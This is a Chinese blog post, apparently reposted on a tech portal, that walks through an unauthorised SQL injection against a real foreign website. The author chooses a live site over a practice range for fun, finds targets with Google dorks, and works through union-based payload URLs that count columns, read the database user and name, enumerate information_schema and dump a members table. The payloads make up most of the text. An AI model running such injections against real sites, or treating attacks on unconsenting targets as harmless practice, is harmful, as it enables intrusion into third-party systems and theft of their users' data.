炼数成金 门户 大数据 安全 查看内容

实操:SQL注入国外xx网站

2019-12-30 16:08| 发布者: 炼数成金_小数| 查看: 12671| 评论: 0|原作者: 程橙橙|来自: 孑蝉

摘要: 学了SQL注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?SQL注入就是SQL+注入,不清楚可以百度。谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。
前言:
学了SQL注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?

何为sql注入?
SQL注入就是SQL+注入,不清楚可以百度。

寻找网站:
google黑语法:
谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。

为什么不用百度呢?
少,并且找的多数为国内。

①、试探
http://www.xxx.org/members.php?id=1


用单引号“'”的时候,是会报错的。

接着测试,order by 5 ,以第5列进行排列,报错。当 表<=实际列数,就不会报错。

http://www.xxx.org/members.php?id=1 order by 5


http://www.xxx.org/members.php?id=1 order by 4


由以上可知,当前表的列为4。

知道了几列,接下来就能知道回显的是哪几列。

②、联合注入
http://www.xxx.org/members.php?id=1 and false union select 1,2,3,4

回显了2,4列。

http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,database()


接下来查字典库,information_schema。

http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,(selecttable_name from information_schema.tables where table_schema=database() limit0,1)

http://www.xxx.org/members.php?id=1 and false union select 1,(select id from db83231_asfaa.members limit 0,1),3,(select column_name frominformation_schema.columns where table_schema=database() andtable_name='members' limit 0,1)

concat字段查一查,member表里面到底有点啥。

http://www.xxx.org/members.php?id=1 and false union select 1,(select concat(id,nome,imagem,texto) from db83231_asfaa.members limit 0,1),3,(selectcolumn_name from information_schema.columns where table_schema=database() andtable_name='members' limit 0,1)

???

...

这是个什么网站呢?


有点意思。。。还好查的都是网站允许显示的数据,不涉及敏感数据。

sqlmap就不上了(只能查出三个数据库,没权限)。

嗯。。。到此为止。

声明:文章收集于网络,版权归原作者所有,为传播信息而发,如有侵权,请联系小编删除,谢谢!

欢迎加入本站公开兴趣群
软件开发技术群
兴趣范围包括:Java,C/C++,Python,PHP,Ruby,shell等各种语言开发经验交流,各种框架使用,外包项目机会,学习、培训、跳槽等交流
QQ群:26931708

Hadoop源代码研究群
兴趣范围包括:Hadoop源代码解读,改进,优化,分布式系统场景定制,与Hadoop有关的各种开源项目,总之就是玩转Hadoop
QQ群:288410967 

鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

热门频道

  • 大数据
  • 商业智能
  • 量化投资
  • 科学探索
  • 创业

即将开课

 

GMT+8, 2020-1-19 01:32 , Processed in 0.110907 second(s), 25 queries .